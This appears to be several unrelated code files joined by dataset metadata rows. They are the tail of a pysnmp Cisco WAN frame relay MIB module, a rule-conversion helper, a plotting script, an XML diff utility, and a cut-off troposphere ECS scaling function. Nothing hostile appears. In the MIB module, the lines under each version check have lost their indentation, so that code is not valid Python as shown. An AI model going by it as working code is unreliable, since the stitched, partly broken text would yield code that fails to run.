if mibBuilder.loadTexts: frstdABRCDF.setDescription('The value of this object is equal to Cutoff Decrease Factor(CDF). The value specified has to be inverted to arrive at the actual value. The valid values possible are 0 and only powers of 2; i.e., 1, 2, 4, 8, 16, 32, 64. The SNMP agent has to verify this compliance.')
frstdABRADTF = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 10230)).clone(500)).setUnits('milli-seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRADTF.setStatus('current')
if mibBuilder.loadTexts: frstdABRADTF.setDescription('The value of this object is equal to ACR Decrease Time Factor(ADTF). The Granularity allowed is 10 milli seconds. i.e. 10,20,30 etc. The SNMP agent has to verify this compliance.')
frstdABRICR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 400000)).clone(10)).setUnits('cells-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRICR.setStatus('current')
if mibBuilder.loadTexts: frstdABRICR.setDescription('The value of this object is equal to Initial Cell Rate(ICR). The ICR is the rate at which the source should send initially and after an idle period. This includes the bandwidth allocated for both data cells as well as all in-rate RM cells.')
frstdABRMCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 400000)).clone(10)).setUnits('cells-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRMCR.setStatus('current')
if mibBuilder.loadTexts: frstdABRMCR.setDescription('The value of this object is equal to Minimum Cell Rate(MCR). The MCR is the rate at which the source is allowed to send. This includes the bandwidth allocated for both data cells as well as all in-rate RM cells.')
frstdABRPCR = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 400000)).clone(10)).setUnits('cells-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: frstdABRPCR.setStatus('current')
if mibBuilder.loadTexts: frstdABRPCR.setDescription('The value of this object is equal to Peak Cell Rate(PCR). The PCR is the rate at which the source is allowed to send. This includes the bandwidth allocated for both data cells as well as all in-rate RM cells.')
frChanStateGrp = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2))
frChanStateGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1), )
if mibBuilder.loadTexts: frChanStateGrpTable.setStatus('current')
if mibBuilder.loadTexts: frChanStateGrpTable.setDescription('Table of transmit/receive states of channels.')
frChanStateGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "stateChanNum"))
if mibBuilder.loadTexts: frChanStateGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frChanStateGrpEntry.setDescription('An entry for FrChannelStateGrpEntry.')
stateChanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: stateChanNum.setStatus('current')
if mibBuilder.loadTexts: stateChanNum.setDescription("The value of this object refers to frame relay connection. The value must be same as the value of the object 'chanNum' in frChanCnfGrpTable.")
chanState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notConfigured", 1), ("okay", 2), ("alarm", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanState.setStatus('current')
if mibBuilder.loadTexts: chanState.setDescription('This variable indicates the LMI state of the VC (channel). The possible values are : notConfigured(1): Connection Not configured okay(2) : Connection is in Ok state alarm(3) : Connection is in alarm failed(4) : Connection is in failed state. This is applicable only for PNNI.')
xmtAbitState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("sendingAequal1", 2), ("sendingAequal0", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: xmtAbitState.setStatus('current')
if mibBuilder.loadTexts: xmtAbitState.setDescription('The value of this object identifies the A bit transmit state. The possible values are : off(1) : LMI is off sendingAequal1(2) : LMI is on and connection is O.K. sendingAequal0(3) : LMI is on and connection is failed.')
rcvAbitState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("rcvingAequal1", 2), ("rcvingAequal0", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rcvAbitState.setStatus('current')
if mibBuilder.loadTexts: rcvAbitState.setDescription('The value of this object identifies the A bit receive state. The possible values are : off(1) : LMI is off rcvingAequal1(2) : LMI is on and connection is O.K. rcvingAequal0(3) : LMI is on and connection is failed.')
xmtATMState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("notSending", 1), ("sendingAIS", 2), ("sendingFERF", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: xmtATMState.setStatus('current')
if mibBuilder.loadTexts: xmtATMState.setDescription('This variable indicates the transmit state of the VC (channel) on the ATM side. The possible values are : notSending(1) : Not sending any state sendingAIS(2) : Sending AIS OAM state sendingFERF(2) : Sending FERF OAM state.')
rcvATMState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("notRcving", 1), ("rcvingAIS", 2), ("rcvingFERF", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rcvATMState.setStatus('current')
if mibBuilder.loadTexts: rcvATMState.setDescription('This variable indicates the receive state of the VC (channel) on the ATM side. The possible values are : notRcving(1) : Not receiving any state rcvingAIS(2) : Receiving AIS OAM rcvingFERF(2) : Receiving FERF OAM.')
chanStatusBitMap = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 2, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanStatusBitMap.setStatus('current')
if mibBuilder.loadTexts: chanStatusBitMap.setDescription('This variable indicates the consolidated bit map of the channel alarm state. Individual bit positions are as defined below. Bit position Fail/Alarm Reason ------------ ---------- ------ 0 Alarm Reserved 1 Alarm n/w side AIS/RDI Rx 2 Fail Conditioned(A bit from n/w) 3 Alarm Reserved 4 Fail CC failed/RAS failed 5 Fail Mismatch 6 Alarm ingress A bit (LMI) 7 Alarm Reserved Fail bitmap mask : 0x34 Alarm bitmap mask: 0xCB This object is not applicable to MGX Release 1.x. ')
frEndPtMapGrp = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3))
frEndPtMapGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1), )
if mibBuilder.loadTexts: frEndPtMapGrpTable.setStatus('current')
if mibBuilder.loadTexts: frEndPtMapGrpTable.setDescription('This is the Endpoint Mapping table for Frame Relay connections.')
frEndPtMapGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "endPortNum"), (0, "CISCO-WAN-FR-CONN-MIB", "endDLCI"))
if mibBuilder.loadTexts: frEndPtMapGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frEndPtMapGrpEntry.setDescription('An entry in the frame relay connection Endpoint table.')
endPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endPortNum.setStatus('current')
if mibBuilder.loadTexts: endPortNum.setDescription("This object identifies the frame relay logical port. The value for this object must be same as 'portNum' object in frPortCnfPortGrpTable. If ifTable is is implemented in a service module, this object must be same as the ifIndex of frame relay port.")
endDLCI = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8388607))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endDLCI.setStatus('current')
if mibBuilder.loadTexts: endDLCI.setDescription('The value of this object is equal to the DLCI value for this PVC endpoint.')
endChanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endChanNum.setStatus('current')
if mibBuilder.loadTexts: endChanNum.setDescription("The value of this object identifies the frame relay connection number. The value of this object is same as the value of 'chanNum' object in frChanCnfGrpTable. This object contains value 0, if port.dlci is a multicast group.")
endLineNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: endLineNum.setStatus('current')
if mibBuilder.loadTexts: endLineNum.setDescription('The value of this object is equal to the physical line(for example T1/E1) or ifIndex on which connection is provisioned. If ifTable is not implemented in a service module, then the range is from 1 to Maximum number of lines supported. If ifTable is is implemented in a service module, this object must be same as the ifIndex of the interface (ifType=ds1(18),ds3(30)). The value supported for this object depends upon the type of service module: FRSM-4T1/E1 : Range is from 1..4 FRSM-8T1/E1 : Range is from 1..8 FRSM-T3/E3/HS2: Range is from 1..2 FRSM-2CT3 : Range is from 1..56 with ifTable Support: must refer to ifIndex of the interface. ')
ciscoWanFrConnMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 47, 2))
ciscoWanFrConnMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1))
ciscoWanFrConnMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 2))
ciscoWanFrConnCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 2, 1)).setObjects(("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnTestGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnStateGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnEndptGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnABRGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnForesightGroup"), ("CISCO-WAN-FR-CONN-MIB", "ciscoWanFrConnQueueGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnCompliance = ciscoWanFrConnCompliance.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnCompliance.setDescription('The compliance statement for SNMP entities which support Frame realy connection MIB.')
ciscoWanFrConnGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 1)).setObjects(("CISCO-WAN-FR-CONN-MIB", "chanNum"), ("CISCO-WAN-FR-CONN-MIB", "chanRowStatus"), ("CISCO-WAN-FR-CONN-MIB", "chanPortNum"), ("CISCO-WAN-FR-CONN-MIB", "dLCI"), ("CISCO-WAN-FR-CONN-MIB", "egressQSelect"), ("CISCO-WAN-FR-CONN-MIB", "deTaggingEnable"), ("CISCO-WAN-FR-CONN-MIB", "cir"), ("CISCO-WAN-FR-CONN-MIB", "bc"), ("CISCO-WAN-FR-CONN-MIB", "be"), ("CISCO-WAN-FR-CONN-MIB", "ibs"), ("CISCO-WAN-FR-CONN-MIB", "chanLocRmtLpbkState"), ("CISCO-WAN-FR-CONN-MIB", "chanType"), ("CISCO-WAN-FR-CONN-MIB", "chanFECNconfig"), ("CISCO-WAN-FR-CONN-MIB", "chanDEtoCLPmap"), ("CISCO-WAN-FR-CONN-MIB", "chanCLPtoDEmap"), ("CISCO-WAN-FR-CONN-MIB", "chanIngrPercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "chanEgrPercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "chanEgrSrvRate"), ("CISCO-WAN-FR-CONN-MIB", "chanOvrSubOvrRide"), ("CISCO-WAN-FR-CONN-MIB", "chanFrConnType"), ("CISCO-WAN-FR-CONN-MIB", "frCDRNumber"), ("CISCO-WAN-FR-CONN-MIB", "frLocalVpi"), ("CISCO-WAN-FR-CONN-MIB", "frLocalVci"), ("CISCO-WAN-FR-CONN-MIB", "frLocalNSAP"), ("CISCO-WAN-FR-CONN-MIB", "frRemoteVpi"), ("CISCO-WAN-FR-CONN-MIB", "frRemoteVci"), ("CISCO-WAN-FR-CONN-MIB", "frRemoteNSAP"), ("CISCO-WAN-FR-CONN-MIB", "frMastership"), ("CISCO-WAN-FR-CONN-MIB", "frVpcFlag"), ("CISCO-WAN-FR-CONN-MIB", "frConnServiceType"), ("CISCO-WAN-FR-CONN-MIB", "frRoutingPriority"), ("CISCO-WAN-FR-CONN-MIB", "frMaxCost"), ("CISCO-WAN-FR-CONN-MIB", "frRestrictTrunkType"), ("CISCO-WAN-FR-CONN-MIB", "frConnPCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemotePCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnMCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemoteMCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnPercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemotePercentUtil"), ("CISCO-WAN-FR-CONN-MIB", "frConnForeSightEnable"), ("CISCO-WAN-FR-CONN-MIB", "frConnFGCRAEnable"), ("CISCO-WAN-FR-CONN-MIB", "chanServType"), ("CISCO-WAN-FR-CONN-MIB", "chanServiceRateOverride"), ("CISCO-WAN-FR-CONN-MIB", "chanServiceRate"), ("CISCO-WAN-FR-CONN-MIB", "zeroCirConEir"), ("CISCO-WAN-FR-CONN-MIB", "chanReroute"), ("CISCO-WAN-FR-CONN-MIB", "frConnSCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemoteSCR"), ("CISCO-WAN-FR-CONN-MIB", "frConnTemplateId"), ("CISCO-WAN-FR-CONN-MIB", "frConnAdminStatus"), ("CISCO-WAN-FR-CONN-MIB", "frChanCnfChangeCount"), ("CISCO-WAN-FR-CONN-MIB", "frChanCnfIgnoreIncomingDE"), ("CISCO-WAN-FR-CONN-MIB", "frChanOamCCEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanStatsEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanLocalLpbkEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanUpcEnable"), ("CISCO-WAN-FR-CONN-MIB", "frChanSlaveType"), ("CISCO-WAN-FR-CONN-MIB", "frConnRemoteMBS"), ("CISCO-WAN-FR-CONN-MIB", "chanNumNextAvailable"), ("CISCO-WAN-FR-CONN-MIB", "frChanPrefRouteId"), ("CISCO-WAN-FR-CONN-MIB", "frChanDirectRoute"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnGroup = ciscoWanFrConnGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnGroup.setDescription('A collection of objects providing information applicable to a Frame Relay Connection.')
ciscoWanFrConnForesightGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 2)).setObjects(("CISCO-WAN-FR-CONN-MIB", "foreSightEnable"), ("CISCO-WAN-FR-CONN-MIB", "qir"), ("CISCO-WAN-FR-CONN-MIB", "mir"), ("CISCO-WAN-FR-CONN-MIB", "pir"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnForesightGroup = ciscoWanFrConnForesightGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnForesightGroup.setDescription('A collection of objects related to foresight feature of a frame realay connection.')
ciscoWanFrConnQueueGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 3)).setObjects(("CISCO-WAN-FR-CONN-MIB", "ingressQDepth"), ("CISCO-WAN-FR-CONN-MIB", "ingressQDEThresh"), ("CISCO-WAN-FR-CONN-MIB", "ingressQECNThresh"), ("CISCO-WAN-FR-CONN-MIB", "egressQDepth"), ("CISCO-WAN-FR-CONN-MIB", "egressQDEThresh"), ("CISCO-WAN-FR-CONN-MIB", "egressQECNThresh"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnQueueGroup = ciscoWanFrConnQueueGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnQueueGroup.setDescription('A collection of objects related to queue depth egress/ingress thresholds.')
ciscoWanFrConnTestGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 4)).setObjects(("CISCO-WAN-FR-CONN-MIB", "chanTestType"), ("CISCO-WAN-FR-CONN-MIB", "chanTestState"), ("CISCO-WAN-FR-CONN-MIB", "chanRTDResult"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnTestGroup = ciscoWanFrConnTestGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnTestGroup.setDescription('A collection of objects related to testing Frame relay connections.')
ciscoWanFrConnStateGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 5)).setObjects(("CISCO-WAN-FR-CONN-MIB", "stateChanNum"), ("CISCO-WAN-FR-CONN-MIB", "chanState"), ("CISCO-WAN-FR-CONN-MIB", "xmtAbitState"), ("CISCO-WAN-FR-CONN-MIB", "rcvAbitState"), ("CISCO-WAN-FR-CONN-MIB", "xmtATMState"), ("CISCO-WAN-FR-CONN-MIB", "rcvATMState"), ("CISCO-WAN-FR-CONN-MIB", "chanStatusBitMap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnStateGroup = ciscoWanFrConnStateGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnStateGroup.setDescription('A collection of objects related to state of Frame Relay connections.')
ciscoWanFrConnEndptGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 6)).setObjects(("CISCO-WAN-FR-CONN-MIB", "endPortNum"), ("CISCO-WAN-FR-CONN-MIB", "endDLCI"), ("CISCO-WAN-FR-CONN-MIB", "endChanNum"), ("CISCO-WAN-FR-CONN-MIB", "endLineNum"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnEndptGroup = ciscoWanFrConnEndptGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnEndptGroup.setDescription('A collection of objects related to Endpoint mapping in Frame Relay Connections.')
ciscoWanFrConnABRGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 47, 2, 1, 7)).setObjects(("CISCO-WAN-FR-CONN-MIB", "frstdABRcnfChanNum"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRTBE"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRFRTT"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRRDF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRRIF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRNrm"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRTrm"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRCDF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRADTF"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRICR"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRMCR"), ("CISCO-WAN-FR-CONN-MIB", "frstdABRPCR"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWanFrConnABRGroup = ciscoWanFrConnABRGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoWanFrConnABRGroup.setDescription('A collection of objects related to ABR in a frame relay connection.')
mibBuilder.exportSymbols("CISCO-WAN-FR-CONN-MIB", ciscoWanFrConnMIBGroups=ciscoWanFrConnMIBGroups, frCDRNumber=frCDRNumber, frChanStateGrpEntry=frChanStateGrpEntry, frChanStatsEnable=frChanStatsEnable, chanServType=chanServType, frConnRemotePCR=frConnRemotePCR, chanDEtoCLPmap=chanDEtoCLPmap, frLocalNSAP=frLocalNSAP, stateChanNum=stateChanNum, frConnSCR=frConnSCR, chanServiceRate=chanServiceRate, frstdABRNrm=frstdABRNrm, ciscoWanFrConnCompliance=ciscoWanFrConnCompliance, qir=qir, ciscoWanFrConnQueueGroup=ciscoWanFrConnQueueGroup, frChanCnfGrpEntry=frChanCnfGrpEntry, frChanLocalLpbkEnable=frChanLocalLpbkEnable, frstdABRCDF=frstdABRCDF, frChanCnfGrp=frChanCnfGrp, ciscoWanFrConnStateGroup=ciscoWanFrConnStateGroup, frstdABRRDF=frstdABRRDF, be=be, xmtATMState=xmtATMState, frRoutingPriority=frRoutingPriority, frstdABRTrm=frstdABRTrm, chanEgrPercentUtil=chanEgrPercentUtil, foreSightEnable=foreSightEnable, chanPortNum=chanPortNum, chanFECNconfig=chanFECNconfig, frConnRemotePercentUtil=frConnRemotePercentUtil, chanServiceRateOverride=chanServiceRateOverride, PYSNMP_MODULE_ID=ciscoWanFrConnMIB, frEndPtMapGrp=frEndPtMapGrp, frstdABRMCR=frstdABRMCR, frstdABRTBE=frstdABRTBE, ciscoWanFrConnTestGroup=ciscoWanFrConnTestGroup, frstdABRcnfChanNum=frstdABRcnfChanNum, bc=bc, egressQDepth=egressQDepth, frEndPtMapGrpTable=frEndPtMapGrpTable, frRemoteVci=frRemoteVci, chanTestType=chanTestType, frstdABRRIF=frstdABRRIF, frMaxCost=frMaxCost, chanEgrSrvRate=chanEgrSrvRate, frChanCnfGrpTable=frChanCnfGrpTable, frConnPercentUtil=frConnPercentUtil, ciscoWanFrConnEndptGroup=ciscoWanFrConnEndptGroup, ciscoWanFrConnMIBCompliances=ciscoWanFrConnMIBCompliances, frConnTemplateId=frConnTemplateId, ingressQDEThresh=ingressQDEThresh, ciscoWanFrConnABRGroup=ciscoWanFrConnABRGroup, mir=mir, xmtAbitState=xmtAbitState, frRemoteVpi=frRemoteVpi, ingressQDepth=ingressQDepth, frChanUpcEnable=frChanUpcEnable, chanFrConnType=chanFrConnType, chanRowStatus=chanRowStatus, egressQDEThresh=egressQDEThresh, egressQSelect=egressQSelect, chanNum=chanNum, rcvAbitState=rcvAbitState, ibs=ibs, endDLCI=endDLCI, ciscoWanFrConnMIB=ciscoWanFrConnMIB, frstdABRCnfGrpEntry=frstdABRCnfGrpEntry, frChanDirectRoute=frChanDirectRoute, frChanSlaveType=frChanSlaveType, frRestrictTrunkType=frRestrictTrunkType, frConnServiceType=frConnServiceType, frstdABRPCR=frstdABRPCR, frstdABRADTF=frstdABRADTF, frEndPtMapGrpEntry=frEndPtMapGrpEntry, chanType=chanType, frMastership=frMastership, frLocalVpi=frLocalVpi, frConnRemoteSCR=frConnRemoteSCR, pir=pir, frConnAdminStatus=frConnAdminStatus, frConnRemoteMBS=frConnRemoteMBS, frChanOamCCEnable=frChanOamCCEnable, chanReroute=chanReroute, chanNumNextAvailable=chanNumNextAvailable, chanTestState=chanTestState, frChanCnfChangeCount=frChanCnfChangeCount, frLocalVci=frLocalVci, frChanPrefRouteId=frChanPrefRouteId, frstdABRICR=frstdABRICR, frstdABRFRTT=frstdABRFRTT, chanLocRmtLpbkState=chanLocRmtLpbkState, ciscoWanFrConnForesightGroup=ciscoWanFrConnForesightGroup, ciscoWanFrConnMIBConformance=ciscoWanFrConnMIBConformance, dLCI=dLCI, frConnRemoteMCR=frConnRemoteMCR, chanState=chanState, frVpcFlag=frVpcFlag, chanRTDResult=chanRTDResult, frConnMCR=frConnMCR, cir=cir, frConnForeSightEnable=frConnForeSightEnable, rcvATMState=rcvATMState, chanStatusBitMap=chanStatusBitMap, frConnFGCRAEnable=frConnFGCRAEnable, frRemoteNSAP=frRemoteNSAP, zeroCirConEir=zeroCirConEir, frChanStateGrpTable=frChanStateGrpTable, egressQECNThresh=egressQECNThresh, chanOvrSubOvrRide=chanOvrSubOvrRide, deTaggingEnable=deTaggingEnable, chanCLPtoDEmap=chanCLPtoDEmap, chanIngrPercentUtil=chanIngrPercentUtil, frConnPCR=frConnPCR, frChanCnfIgnoreIncomingDE=frChanCnfIgnoreIncomingDE, endChanNum=endChanNum, endLineNum=endLineNum, ingressQECNThresh=ingressQECNThresh, frChanStateGrp=frChanStateGrp, endPortNum=endPortNum, ciscoWanFrConnGroup=ciscoWanFrConnGroup, frstdABRCnfGrpTable=frstdABRCnfGrpTable)
| 224.971354 | 3,885 | 0.765676 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp-with-texts/CISCO-WAN-FR-CONN-MIB.py | 86,389 | Python |
from typing import List
from pyarc.data_structures.car import ClassAssocationRule
from pyarc.data_structures.antecedent import Antecedent as CARAntecedent
from pyarc.data_structures.consequent import Consequent as CARConsequent
from mdrsl.data_structures.rules.generalized_rule_part import GeneralizedAntecedent
from mdrsl.data_structures.rules.rule_part import Consequent as MCARConsequent
from mdrsl.data_structures.rules.multi_target_class_association_rule import MCAR
from mdrsl.data_structures.item import EQLiteral
def convert_single_target_car_to_multi_target_car(single_target_car: ClassAssocationRule) -> MCAR:
st_antecedent: CARAntecedent = single_target_car.antecedent
st_consequent: CARConsequent = single_target_car.consequent
mcar_antecedent_literals: List[EQLiteral] = []
for literal in st_antecedent:
attribute, value = literal
mcar_antecedent_literals.append(EQLiteral(attribute=attribute, value=value))
mcar_antecedent = GeneralizedAntecedent(mcar_antecedent_literals)
mcar_consequent: MCARConsequent = MCARConsequent(
[EQLiteral(attribute=st_consequent.attribute, value=st_consequent.value)])
return MCAR(antecedent=mcar_antecedent, consequent=mcar_consequent,
support=single_target_car.support,
confidence=single_target_car.confidence)
| 44.933333 | 98 | 0.818991 | [
"Apache-2.0"
] | joschout/Multi-Directional-Rule-Set-Learning | mdrsl/rule_generation/association_rule_mining/convert_single_target_car_to_multi_target_car.py | 1,348 | Python |
import numpy as np
from plots import plots_for_predictions as pp
import sys
sys.path.append('/Users/lls/Documents/mlhalos_code/')
from mlhalos import distinct_colours as dc
import matplotlib.pyplot as plt
from pickle import load
c = dc.get_distinct(6)
path = '/Users/lls/Documents/deep_halos_files/mass_range_13.4/random_20sims_200k/lr5e-5/'
p1 = np.load(path + "seed_20/all_predicted_sim_6_epoch_09.npy")
t1 = np.load(path + "seed_20/all_true_sim_6_epoch_09.npy")
g = np.load(path + "seed_20/gamma.npy")[9]
path2 = '/Users/lls/Documents/deep_halos_files/mass_range_13.4/random_20sims_200k/averaged_boxes/log_alpha_-4/'
scaler_training_set = load(open(path2 + 'scaler_output.pkl', 'rb'))
slices = [-0.85, -0.6, 0, 0.5, 0.75, 0.95]
f, a = pp.plot_likelihood_distribution(p1, t1, g, scaler_training_set, bins=None, fig=None, axes=None, color=c[4],
title=None, legend=True, slices=slices) | 44.190476 | 114 | 0.737069 | [
"MIT"
] | lluciesmith/DeepHalos | paper_plots/plot_likelihood.py | 928 | Python |
from __future__ import absolute_import
from .implementations import ChildDiffingMixing, ImplementationBase
from .differ import make_differ
import xml.dom.minidom as dom
import re
class DiffXMLDocument(ChildDiffingMixing, ImplementationBase):
diffs_types = dom.Document
def path_and_child(self, doc):
yield "?xml@version", doc.version
yield "?xml@encoding", doc.encoding
yield "?xml@standalone", doc.standalone
for i, child in enumerate(doc.childNodes):
if hasattr(child, 'tagName'):
yield "/%d<%s>" % (i, child.tagName), child
else:
yield "/%d:text" % i, child.data
class DiffXMLElement(ChildDiffingMixing, ImplementationBase):
diffs_types = dom.Element
def path_and_child(self, el):
yield ":tag", el.tagName
for name, value in el.attributes.items():
yield "@%s" % name, value
for i, child in enumerate(el.childNodes):
if hasattr(child, 'tagName'):
yield "/%d<%s>" % (i, child.tagName), child
else:
yield "/%d:text" % i, child.data
def diff_xml(expected, actual, *args, **kw):
xmls = map(dom.parseString, (expected,actual))
return make_differ(
DiffXMLDocument,
DiffXMLElement
)(*(tuple(xmls) + args), **kw) | 25.695652 | 67 | 0.705584 | [
"BSD-2-Clause"
] | clarabstract/treecompare | treecompare/xml.py | 1,182 | Python |
"""
Adds troposphere methods for adding scaling to a cluster
"""
from troposphere.awslambda import Function, Code, Environment, Permission
from troposphere import Ref, Sub, GetAtt
from troposphere.iam import Role, Policy
from troposphere.events import Target, Rule
from troposphere.ssm import Parameter
from ecs_cluster_deployer.utils import sanitize_cfn_resource_name
def add_scaling(spot_fleet, template, cluster_name):
""" Add scaling resources to a cluster """
ssm_param = Parameter(
'Scale{}'.format(sanitize_cfn_resource_name(spot_fleet.get('name'))),
Type="String",
Value="0",
Name=Sub("/ecs-maestro/${ClusterName}/${Version}/scaletime")
)
template.add_resource(ssm_param)
function_name = sanitize_cfn_resource_name(cluster_name)
autoscaling_role = Role(
"AutoscalingRole",
AssumeRolePolicyDocument={
